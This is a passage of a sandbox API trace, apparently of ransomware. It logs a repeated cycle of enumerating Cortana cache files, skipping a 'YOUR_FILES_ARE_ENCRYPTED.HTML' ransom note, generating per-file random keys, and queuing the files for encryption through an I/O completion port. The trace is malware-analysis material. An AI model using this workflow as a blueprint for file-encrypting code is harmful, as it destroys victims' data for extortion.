[0118.931] wsprintfW (in: param_1=0x19d7ea, param_2="%02X" | out: param_1="11") returned 2 [0118.931] lstrcpyW (in: lpString1=0x32b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt" [0118.931] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x274, CompletionKey=0x32a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0118.931] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x32a0048, lpOverlapped=0x32a0048) returned 1 [0118.931] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xebf5d218, ftCreationTime.dwHighDateTime=0x1d7045f, ftLastAccessTime.dwLowDateTime=0xebf5d218, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0x59f07586, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x12639, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt", cAlternateFileName="C_647E~1.TXT")) returned 1 [0118.931] StrStrIW (lpFirst="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.932] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt") returned 197 [0118.932] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt") returned=".txt" [0118.932] lstrlenW (lpString=".txt") returned 4 [0118.932] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt") returned=".txt" [0118.932] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0118.932] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\c1j92j4x\\6\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_11[1].txt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0118.932] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=75321) returned 1 [0118.932] GetProcessHeap () returned 0x600000 [0118.932] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x32c81a0 [0118.934] wsprintfW (in: param_1=0x19d76e, param_2="%02X" | out: param_1="3D") returned 2 [0118.934] wsprintfW (in: param_1=0x19d772, param_2="%02X" | out: param_1="11") returned 2 [0118.934] wsprintfW (in: param_1=0x19d776, param_2="%02X" | out: param_1="30") returned 2 [0118.934] wsprintfW (in: param_1=0x19d77a, param_2="%02X" | out: param_1="09") returned 2 [0118.934] wsprintfW (in: param_1=0x19d77e, param_2="%02X" | out: param_1="87") returned 2 [0118.934] wsprintfW (in: param_1=0x19d782, param_2="%02X" | out: param_1="91") returned 2 [0118.934] wsprintfW (in: param_1=0x19d786, param_2="%02X" | out: param_1="C7") returned 2 [0118.934] wsprintfW (in: param_1=0x19d78a, param_2="%02X" | out: param_1="D9") returned 2 [0118.934] wsprintfW (in: param_1=0x19d78e, param_2="%02X" | out: param_1="5F") returned 2 [0118.934] wsprintfW (in: param_1=0x19d792, param_2="%02X" | out: param_1="18") returned 2 [0118.934] wsprintfW (in: param_1=0x19d796, param_2="%02X" | out: param_1="B6") returned 2 [0118.934] wsprintfW (in: param_1=0x19d79a, param_2="%02X" | out: param_1="C0") returned 2 [0118.934] wsprintfW (in: param_1=0x19d79e, param_2="%02X" | out: param_1="3C") returned 2 [0118.934] wsprintfW (in: param_1=0x19d7a2, param_2="%02X" | out: param_1="8B") returned 2 [0118.934] wsprintfW (in: param_1=0x19d7a6, param_2="%02X" | out: param_1="12") returned 2 [0118.934] wsprintfW (in: param_1=0x19d7aa, param_2="%02X" | out: param_1="26") returned 2 [0118.934] wsprintfW (in: param_1=0x19d7ae, param_2="%02X" | out: param_1="7E") returned 2 [0118.934] wsprintfW (in: param_1=0x19d7b2, param_2="%02X" | out: param_1="91") returned 2 [0118.934] wsprintfW (in: param_1=0x19d7b6, param_2="%02X" | out: param_1="76") returned 2 [0118.934] wsprintfW (in: param_1=0x19d7ba, param_2="%02X" | out: param_1="72") returned 2 [0118.934] wsprintfW (in: param_1=0x19d7be, param_2="%02X" | out: param_1="15") returned 2 [0118.934] wsprintfW (in: param_1=0x19d7c2, param_2="%02X" | out: param_1="84") returned 2 [0118.934] wsprintfW (in: param_1=0x19d7c6, param_2="%02X" | out: param_1="AC") returned 2 [0118.935] wsprintfW (in: param_1=0x19d7ca, param_2="%02X" | out: param_1="6D") returned 2 [0118.935] wsprintfW (in: param_1=0x19d7ce, param_2="%02X" | out: param_1="BF") returned 2 [0118.935] wsprintfW (in: param_1=0x19d7d2, param_2="%02X" | out: param_1="D2") returned 2 [0118.935] wsprintfW (in: param_1=0x19d7d6, param_2="%02X" | out: param_1="0C") returned 2 [0118.935] wsprintfW (in: param_1=0x19d7da, param_2="%02X" | out: param_1="E2") returned 2 [0118.935] wsprintfW (in: param_1=0x19d7de, param_2="%02X" | out: param_1="29") returned 2 [0118.935] wsprintfW (in: param_1=0x19d7e2, param_2="%02X" | out: param_1="E6") returned 2 [0118.935] wsprintfW (in: param_1=0x19d7e6, param_2="%02X" | out: param_1="0B") returned 2 [0118.935] wsprintfW (in: param_1=0x19d7ea, param_2="%02X" | out: param_1="53") returned 2 [0118.935] lstrcpyW (in: lpString1=0x32d8254, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt" [0118.935] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x32c81a0, NumberOfConcurrentThreads=0x0) returned 0x274 [0118.935] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x32c81a0, lpOverlapped=0x32c81a0) returned 1 [0118.935] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec041f56, ftCreationTime.dwHighDateTime=0x1d7045f, ftLastAccessTime.dwLowDateTime=0xec041f56, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0x59f2d924, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x135cb, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt", cAlternateFileName="C_EAA3~1.TXT")) returned 1 [0118.935] StrStrIW (lpFirst="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.935] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt") returned 197 [0118.935] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt") returned=".txt" [0118.935] lstrlenW (lpString=".txt") returned 4 [0118.935] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt") returned=".txt" [0118.935] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0118.936] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\c1j92j4x\\6\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_12[1].txt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x33c [0118.936] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=79307) returned 1 [0118.936] GetProcessHeap () returned 0x600000 [0118.936] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x32f02f8 [0118.960] wsprintfW (in: param_1=0x19d76e, param_2="%02X" | out: param_1="34") returned 2 [0118.960] wsprintfW (in: param_1=0x19d772, param_2="%02X" | out: param_1="E3") returned 2 [0118.960] wsprintfW (in: param_1=0x19d776, param_2="%02X" | out: param_1="72") returned 2 [0118.960] wsprintfW (in: param_1=0x19d77a, param_2="%02X" | out: param_1="3C") returned 2 [0118.960] wsprintfW (in: param_1=0x19d77e, param_2="%02X" | out: param_1="88") returned 2 [0118.960] wsprintfW (in: param_1=0x19d782, param_2="%02X" | out: param_1="A4") returned 2 [0118.960] wsprintfW (in: param_1=0x19d786, param_2="%02X" | out: param_1="6A") returned 2 [0118.960] wsprintfW (in: param_1=0x19d78a, param_2="%02X" | out: param_1="75") returned 2 [0118.960] wsprintfW (in: param_1=0x19d78e, param_2="%02X" | out: param_1="98") returned 2 [0118.960] wsprintfW (in: param_1=0x19d792, param_2="%02X" | out: param_1="ED") returned 2 [0118.960] wsprintfW (in: param_1=0x19d796, param_2="%02X" | out: param_1="B9") returned 2 [0118.960] wsprintfW (in: param_1=0x19d79a, param_2="%02X" | out: param_1="A3") returned 2 [0118.960] wsprintfW (in: param_1=0x19d79e, param_2="%02X" | out: param_1="DA") returned 2 [0118.960] wsprintfW (in: param_1=0x19d7a2, param_2="%02X" | out: param_1="35") returned 2 [0118.960] wsprintfW (in: param_1=0x19d7a6, param_2="%02X" | out: param_1="63") returned 2 [0118.960] wsprintfW (in: param_1=0x19d7aa, param_2="%02X" | out: param_1="F2") returned 2 [0118.960] wsprintfW (in: param_1=0x19d7ae, param_2="%02X" | out: param_1="49") returned 2 [0118.960] wsprintfW (in: param_1=0x19d7b2, param_2="%02X" | out: param_1="8F") returned 2 [0118.960] wsprintfW (in: param_1=0x19d7b6, param_2="%02X" | out: param_1="73") returned 2 [0118.960] wsprintfW (in: param_1=0x19d7ba, param_2="%02X" | out: param_1="72") returned 2 [0118.960] wsprintfW (in: param_1=0x19d7be, param_2="%02X" | out: param_1="B7") returned 2 [0118.961] wsprintfW (in: param_1=0x19d7c2, param_2="%02X" | out: param_1="1A") returned 2 [0118.961] wsprintfW (in: param_1=0x19d7c6, param_2="%02X" | out: param_1="23") returned 2 [0118.961] wsprintfW (in: param_1=0x19d7ca, param_2="%02X" | out: param_1="4D") returned 2 [0118.961] wsprintfW (in: param_1=0x19d7ce, param_2="%02X" | out: param_1="6F") returned 2 [0118.961] wsprintfW (in: param_1=0x19d7d2, param_2="%02X" | out: param_1="AA") returned 2 [0118.961] wsprintfW (in: param_1=0x19d7d6, param_2="%02X" | out: param_1="D3") returned 2 [0118.961] wsprintfW (in: param_1=0x19d7da, param_2="%02X" | out: param_1="37") returned 2 [0118.961] wsprintfW (in: param_1=0x19d7de, param_2="%02X" | out: param_1="78") returned 2 [0118.961] wsprintfW (in: param_1=0x19d7e2, param_2="%02X" | out: param_1="78") returned 2 [0118.961] wsprintfW (in: param_1=0x19d7e6, param_2="%02X" | out: param_1="9B") returned 2 [0118.961] wsprintfW (in: param_1=0x19d7ea, param_2="%02X" | out: param_1="6E") returned 2 [0118.961] lstrcpyW (in: lpString1=0x33003ac, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt" [0118.961] CreateIoCompletionPort (FileHandle=0x33c, ExistingCompletionPort=0x274, CompletionKey=0x32f02f8, NumberOfConcurrentThreads=0x0) returned 0x274 [0118.961] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x32f02f8, lpOverlapped=0x32f02f8) returned 1 [0118.962] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec041f56, ftCreationTime.dwHighDateTime=0x1d7045f, ftLastAccessTime.dwLowDateTime=0xec041f56, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0x59f2d924, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x3826, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt", cAlternateFileName="C_F04C~1.TXT")) returned 1 [0118.962] StrStrIW (lpFirst="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.962] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt") returned 197 [0118.962] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt") returned=".txt" [0118.962] lstrlenW (lpString=".txt") returned 4 [0118.963] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt") returned=".txt" [0118.963] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0118.963] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\c1j92j4x\\6\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_13[1].txt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0118.967] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=14374) returned 1 [0118.967] GetProcessHeap () returned 0x600000 [0118.967] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x680348 [0118.969] wsprintfW (in: param_1=0x19d76e, param_2="%02X" | out: param_1="DB") returned 2 [0118.969] wsprintfW (in: param_1=0x19d772, param_2="%02X" | out: param_1="7A") returned 2 [0118.969] wsprintfW (in: param_1=0x19d776, param_2="%02X" | out: param_1="93") returned 2 [0118.969] wsprintfW (in: param_1=0x19d77a, param_2="%02X" | out: param_1="1A") returned 2 [0118.969] wsprintfW (in: param_1=0x19d77e, param_2="%02X" | out: param_1="7D") returned 2 [0118.970] wsprintfW (in: param_1=0x19d782, param_2="%02X" | out: param_1="C7") returned 2 [0118.970] wsprintfW (in: param_1=0x19d786, param_2="%02X" | out: param_1="CF") returned 2 [0118.970] wsprintfW (in: param_1=0x19d78a, param_2="%02X" | out: param_1="3A") returned 2 [0118.970] wsprintfW (in: param_1=0x19d78e, param_2="%02X" | out: param_1="8D") returned 2 [0118.970] wsprintfW (in: param_1=0x19d792, param_2="%02X" | out: param_1="C8") returned 2 [0118.970] wsprintfW (in: param_1=0x19d796, param_2="%02X" | out: param_1="54") returned 2 [0118.970] wsprintfW (in: param_1=0x19d79a, param_2="%02X" | out: param_1="C1") returned 2 [0118.970] wsprintfW (in: param_1=0x19d79e, param_2="%02X" | out: param_1="F0") returned 2 [0118.970] wsprintfW (in: param_1=0x19d7a2, param_2="%02X" | out: param_1="CD") returned 2 [0118.970] wsprintfW (in: param_1=0x19d7a6, param_2="%02X" | out: param_1="06") returned 2 [0118.970] wsprintfW (in: param_1=0x19d7aa, param_2="%02X" | out: param_1="5D") returned 2 [0118.970] wsprintfW (in: param_1=0x19d7ae, param_2="%02X" | out: param_1="53") returned 2 [0118.970] wsprintfW (in: param_1=0x19d7b2, param_2="%02X" | out: param_1="D3") returned 2 [0118.970] wsprintfW (in: param_1=0x19d7b6, param_2="%02X" | out: param_1="E9") returned 2 [0118.970] wsprintfW (in: param_1=0x19d7ba, param_2="%02X" | out: param_1="FC") returned 2 [0118.970] wsprintfW (in: param_1=0x19d7be, param_2="%02X" | out: param_1="0F") returned 2 [0118.970] wsprintfW (in: param_1=0x19d7c2, param_2="%02X" | out: param_1="DF") returned 2 [0118.970] wsprintfW (in: param_1=0x19d7c6, param_2="%02X" | out: param_1="B0") returned 2 [0118.970] wsprintfW (in: param_1=0x19d7ca, param_2="%02X" | out: param_1="0D") returned 2 [0118.970] wsprintfW (in: param_1=0x19d7ce, param_2="%02X" | out: param_1="A0") returned 2 [0118.970] wsprintfW (in: param_1=0x19d7d2, param_2="%02X" | out: param_1="AC") returned 2 [0118.970] wsprintfW (in: param_1=0x19d7d6, param_2="%02X" | out: param_1="C4") returned 2 [0118.970] wsprintfW (in: param_1=0x19d7da, param_2="%02X" | out: param_1="EB") returned 2 [0118.970] wsprintfW (in: param_1=0x19d7de, param_2="%02X" | out: param_1="65") returned 2 [0118.970] wsprintfW (in: param_1=0x19d7e2, param_2="%02X" | out: param_1="6D") returned 2 [0118.970] wsprintfW (in: param_1=0x19d7e6, param_2="%02X" | out: param_1="26") returned 2 [0118.970] wsprintfW (in: param_1=0x19d7ea, param_2="%02X" | out: param_1="05") returned 2 [0118.971] lstrcpyW (in: lpString1=0x6903fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt" [0118.971] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x680348, NumberOfConcurrentThreads=0x0) returned 0x274 [0118.971] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x680348, lpOverlapped=0x680348) returned 1 [0118.971] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec0681fa, ftCreationTime.dwHighDateTime=0x1d7045f, ftLastAccessTime.dwLowDateTime=0xec0681fa, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0x59f2d924, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x6a1a, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt", cAlternateFileName="C_988E~1.TXT")) returned 1 [0118.971] StrStrIW (lpFirst="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.971] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt") returned 197 [0118.971] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt") returned=".txt" [0118.971] lstrlenW (lpString=".txt") returned 4 [0118.974] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt") returned=".txt" [0118.975] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0118.975] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\c1j92j4x\\6\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_14[1].txt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0118.979] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=27162) returned 1 [0118.979] GetProcessHeap () returned 0x600000 [0118.979] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x680348 [0118.981] wsprintfW (in: param_1=0x19d76e, param_2="%02X" | out: param_1="87") returned 2 [0118.981] wsprintfW (in: param_1=0x19d772, param_2="%02X" | out: param_1="70") returned 2 [0118.981] wsprintfW (in: param_1=0x19d776, param_2="%02X" | out: param_1="78") returned 2 [0118.981] wsprintfW (in: param_1=0x19d77a, param_2="%02X" | out: param_1="55") returned 2 [0118.981] wsprintfW (in: param_1=0x19d77e, param_2="%02X" | out: param_1="B5") returned 2 [0118.981] wsprintfW (in: param_1=0x19d782, param_2="%02X" | out: param_1="5B") returned 2 [0118.981] wsprintfW (in: param_1=0x19d786, param_2="%02X" | out: param_1="25") returned 2 [0118.981] wsprintfW (in: param_1=0x19d78a, param_2="%02X" | out: param_1="CC") returned 2 [0118.981] wsprintfW (in: param_1=0x19d78e, param_2="%02X" | out: param_1="D5") returned 2 [0118.981] wsprintfW (in: param_1=0x19d792, param_2="%02X" | out: param_1="04") returned 2 [0118.981] wsprintfW (in: param_1=0x19d796, param_2="%02X" | out: param_1="13") returned 2 [0118.981] wsprintfW (in: param_1=0x19d79a, param_2="%02X" | out: param_1="5F") returned 2 [0118.981] wsprintfW (in: param_1=0x19d79e, param_2="%02X" | out: param_1="E4") returned 2 [0118.981] wsprintfW (in: param_1=0x19d7a2, param_2="%02X" | out: param_1="F1") returned 2 [0118.981] wsprintfW (in: param_1=0x19d7a6, param_2="%02X" | out: param_1="F0") returned 2 [0118.981] wsprintfW (in: param_1=0x19d7aa, param_2="%02X" | out: param_1="06") returned 2 [0118.981] wsprintfW (in: param_1=0x19d7ae, param_2="%02X" | out: param_1="4A") returned 2 [0118.981] wsprintfW (in: param_1=0x19d7b2, param_2="%02X" | out: param_1="C0") returned 2 [0118.981] wsprintfW (in: param_1=0x19d7b6, param_2="%02X" | out: param_1="20") returned 2 [0118.981] wsprintfW (in: param_1=0x19d7ba, param_2="%02X" | out: param_1="1C") returned 2 [0118.981] wsprintfW (in: param_1=0x19d7be, param_2="%02X" | out: param_1="1B") returned 2 [0118.982] wsprintfW (in: param_1=0x19d7c2, param_2="%02X" | out: param_1="B7") returned 2 [0118.982] wsprintfW (in: param_1=0x19d7c6, param_2="%02X" | out: param_1="81") returned 2 [0118.982] wsprintfW (in: param_1=0x19d7ca, param_2="%02X" | out: param_1="B1") returned 2 [0118.982] wsprintfW (in: param_1=0x19d7ce, param_2="%02X" | out: param_1="39") returned 2 [0118.982] wsprintfW (in: param_1=0x19d7d2, param_2="%02X" | out: param_1="98") returned 2 [0118.982] wsprintfW (in: param_1=0x19d7d6, param_2="%02X" | out: param_1="1D") returned 2 [0118.982] wsprintfW (in: param_1=0x19d7da, param_2="%02X" | out: param_1="1A") returned 2 [0118.982] wsprintfW (in: param_1=0x19d7de, param_2="%02X" | out: param_1="E6") returned 2 [0118.982] wsprintfW (in: param_1=0x19d7e2, param_2="%02X" | out: param_1="DD") returned 2 [0118.982] wsprintfW (in: param_1=0x19d7e6, param_2="%02X" | out: param_1="D2") returned 2 [0118.982] wsprintfW (in: param_1=0x19d7ea, param_2="%02X" | out: param_1="3A") returned 2 [0118.982] lstrcpyW (in: lpString1=0x6903fc, 